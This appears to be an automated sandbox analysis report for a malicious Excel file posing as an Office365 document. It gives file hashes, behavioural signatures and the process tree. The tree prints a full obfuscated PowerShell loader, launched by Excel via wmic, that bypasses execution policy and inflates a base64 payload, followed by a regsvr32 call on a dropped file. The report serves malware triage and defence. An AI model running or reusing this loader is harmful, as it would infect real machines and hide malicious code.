Overview

overview

10

Static

static

8

Office365_155649.xls

windows7_x64

10

Office365_155649.xls

windows10_x64

10

Analysis

  • max time kernel
    135s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    13-07-2020 23:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Office365_155649.xls

  • Size

    65KB

  • MD5

    ad99acf449d38ae16688948601ac1c48

  • SHA1

    aca7300bbd57be32427a1b69ab7ab9792d4d7efe

  • SHA256

    478b989b58015300f188b4d6459d08d61edef08730fdc2256601cddd7b98ebb3

  • SHA512

    9893e23ce9856eb086992d3ccbce7a673b0cbab171eeac991034eb5ac3f5d6f735e1f49a767e05dc77c1b09a3a66f161add8d2921895bf783e5b64e18057a635

Score
10/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Office365_155649.xls"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:2728
    • C:\Windows\System32\Wbem\wmic.exe
      wmic pROcesS call CREATE "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      PID:728
  • C:\Windows\System32\WindowsPowerShell\v1.0\pOwershElL.exe
    pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:2220
    • C:\Windows\system32\regsvr32.exe
      "C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.
      2⤵
        PID:1508

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/728-4-0x0000000000000000-mapping.dmp

      Download

    • memory/1508-5-0x0000000000000000-mapping.dmp

      Download

    • memory/2728-3-0x00000145AA600000-0x00000145AA605000-memory.dmp

      Filesize

      20KB

      Download